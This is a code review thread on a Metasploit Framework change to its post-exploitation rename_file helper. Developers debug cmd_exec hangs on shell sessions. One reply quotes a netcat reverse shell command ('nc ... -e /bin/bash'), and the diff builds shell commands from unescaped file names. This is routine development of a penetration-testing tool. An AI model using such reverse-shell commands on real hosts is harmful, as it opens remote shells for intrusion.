lib/msf/core/post/file.rb

```diff
@@ -501,19 +501,25 @@ def rm_rf(*remote_dirs)
   alias :dir_rm :rm_rf
 
   #
-  # Rename a remote file.
+  # Renames a remote file and returns true on success and false
+  # on failure
   #
   # @param old_file [String] Remote file name to move
   # @param new_file [String] The new name for the remote file
   def rename_file(old_file, new_file)
+    unless exist?(old_file)
+      elog("The file to be renamed does not exists!")
+      return false
+    end
+    verification_token = Rex::Text.rand_text_alphanumeric()
     if session.type == "meterpreter"
       return (session.fs.file.mv(old_file, new_file).result == 0)
+    elsif session.type == 'powershell'
+      !!cmd_exec("Rename-Item -Path \"#{old_file}\" -NewName \"#{new_file}\" && echo #{verification_token}") =~ /#{verification_token}/
+    elsif session.platform == 'windows'
+      !!(cmd_exec(%Q|move /y "#{old_file}" "#{new_file}" & if not errorlevel 1 echo #{verification_token}|) =~ /#{verification_token}/)
```

Comment:
If the `exists?` check is removed, then it looks like this will hang if `old_file` doesn't exist before cmd_exec returns `nil` which will cause an exception. It sort of looks like the stack trace doesn't have anything to do with these changes though.

```
>> cmd_exec(%Q|move /y "#{old_file}" "#{new_file}" & if not errorlevel 1 (echo success ) else (echo fail)|)
Traceback (most recent call last):
	... 1 levels...
	28: from /home/smcintyre/Repositories/metasploit-framework.pr/lib/metasploit/framework/command/base.rb:82:in `start'
	27: from /home/smcintyre/Repositories/metasploit-framework.pr/lib/metasploit/framework/command/console.rb:48:in `start'
	26: from /home/smcintyre/Repositories/metasploit-framework.pr/lib/rex/ui/text/shell.rb:155:in `run'
	25: from /home/smcintyre/Repositories/metasploit-framework.pr/lib/rex/ui/text/dispatcher_shell.rb:475:in `run_single'
	24: from /home/smcintyre/Repositories/metasploit-framework.pr/lib/rex/ui/text/dispatcher_shell.rb:475:in `each'
	23: from /home/smcintyre/Repositories/metasploit-framework.pr/lib/rex/ui/text/dispatcher_shell.rb:481:in `block in run_single'
	22: from /home/smcintyre/Repositories/metasploit-framework.pr/lib/rex/ui/text/dispatcher_shell.rb:532:in `run_command'
	21: from /home/smcintyre/Repositories/metasploit-framework.pr/lib/msf/ui/console/command_dispatcher/developer.rb:113:in `cmd_irb'
	20: from /home/smcintyre/Repositories/metasploit-framework.pr/lib/rex/ui/text/shell/history_manager.rb:44:in `with_context'
	19: from /home/smcintyre/Repositories/metasploit-framework.pr/lib/msf/ui/console/command_dispatcher/developer.rb:117:in `block in cmd_irb'
	18: from /home/smcintyre/Repositories/metasploit-framework.pr/lib/rex/ui/text/irb_shell.rb:52:in `run'
	17: from /home/smcintyre/Repositories/metasploit-framework.pr/lib/rex/ui/text/irb_shell.rb:52:in `catch'
	16: from /home/smcintyre/Repositories/metasploit-framework.pr/lib/rex/ui/text/irb_shell.rb:53:in `block in run'
	 3: from (irb):41:in `<main>'
	 2: from /home/smcintyre/Repositories/metasploit-framework.pr/lib/msf/core/post/common.rb:111:in `cmd_exec'
	 1: from /home/smcintyre/Repositories/metasploit-framework.pr/lib/msf/base/sessions/command_shell_windows.rb:10:in `shell_command_token'
/home/smcintyre/Repositories/metasploit-framework.pr/lib/msf/core/session/provider/single_command_shell.rb:136:in `shell_command_token_win32': undefined method `reverse!' for nil:NilClass (NoMethodError)
```

Would you be able to update that to return immediately and not crash without the `exists?` check? If it's not possible, you could include the `exists?` check just for this one.

Reply:
okay, how can we return immediately, by adding a timeout like something? Also it's hanging for me in case of linux too, when the `old_file` is not present. But it's returning `false` instead of raising an error.

Reply:
One more thing I can noticed is when the operation gets failed `cmd_exec` hangs for sometime. Maybe it's because the `stderr` is not being returned to the msf and getting printed on the terminal where I executed the payload.
```
?> def commandnotpresent
?>   start = Time.now
?>   cmd_exec('command_not_present')
?>   finish = Time.now
?>   diff = finish - start
?>   puts diff
>> end
=> :commandnotpresent
>> commandnotpresent
15.228765365
=> nil
```
```
?> def commandpresent
?>   start = Time.now
?>   cmd_exec('id -u')
?>   finish = Time.now
?>   diff = finish - start
?>   puts diff
>> end
>> commandpresent
0.012737335
=> nil
```

Reply:
I'd prefer to not add a timeout because then it would still hang unnecessarily. When the command fails it should fail immediately, so the fact that it hangs when the command isn't valid or fails for some reason seems like a bug. I was not able to reproduce this though with a session from `linux/x64/shell/reverse_tcp`.

```
msf6 post(linux/gather/checkvm) > sessions

Active sessions
===============

  Id  Name  Type             Information  Connection
  --  ----  ----             -----------  ----------
  1         shell x64/linux               192.168.159.128:4444 -> 192.168.159.128:51438 (192.168.159.128)

msf6 post(linux/gather/checkvm) > pry
[*] Starting Pry shell...
[*] You are in the "post/linux/gather/checkvm" module object

[1] pry(#<Msf::Modules::Post__Linux__Gather__Checkvm::MetasploitModule>)> def commandnotpresent
[1] pry(#<Msf::Modules::Post__Linux__Gather__Checkvm::MetasploitModule>)*   start = Time.now
[1] pry(#<Msf::Modules::Post__Linux__Gather__Checkvm::MetasploitModule>)*   cmd_exec('command_not_present')
[1] pry(#<Msf::Modules::Post__Linux__Gather__Checkvm::MetasploitModule>)*   Time.now - start
[1] pry(#<Msf::Modules::Post__Linux__Gather__Checkvm::MetasploitModule>)* end  
=> :commandnotpresent
[2] pry(#<Msf::Modules::Post__Linux__Gather__Checkvm::MetasploitModule>)> commandnotpresent
=> 0.061294056
[3] pry(#<Msf::Modules::Post__Linux__Gather__Checkvm::MetasploitModule>)> def commandpresent
[3] pry(#<Msf::Modules::Post__Linux__Gather__Checkvm::MetasploitModule>)*   start = Time.now
[3] pry(#<Msf::Modules::Post__Linux__Gather__Checkvm::MetasploitModule>)*   cmd_exec('id -u')
[3] pry(#<Msf::Modules::Post__Linux__Gather__Checkvm::MetasploitModule>)*   Time.now - start
[3] pry(#<Msf::Modules::Post__Linux__Gather__Checkvm::MetasploitModule>)* end  
=> :commandpresent
[4] pry(#<Msf::Modules::Post__Linux__Gather__Checkvm::MetasploitModule>)> commandpresent
=> 0.051641435
[5] pry(#<Msf::Modules::Post__Linux__Gather__Checkvm::MetasploitModule>)> 
```

What payload type were you using? You could be right in that it could be a problem in how different payloads handle the streams. If that's the case then it'd likely need to be fixed in the payloads that are affected. From what I'm seeing the `linux/x64/shell/reverse_tcp` one is working the way I would expect it to.

Reply:
I was using `linux/x64/shell_reverse_tcp` handler with `nc localhost 4444 -e /bin/bash`

Reply:
Alright well using netcat isn't the actual `linux/x64/shell_reverse_tcp` payload so I wouldn't worry about that too much. I think it's safe to say that the issue where it hangs on a bad command is dependent on the payload for Linux at least.

Can you just try to avoid the hanging issue for the Windows branch?

We'll probably need to fix the Linux ones on a payload by payload basis in separate PRs.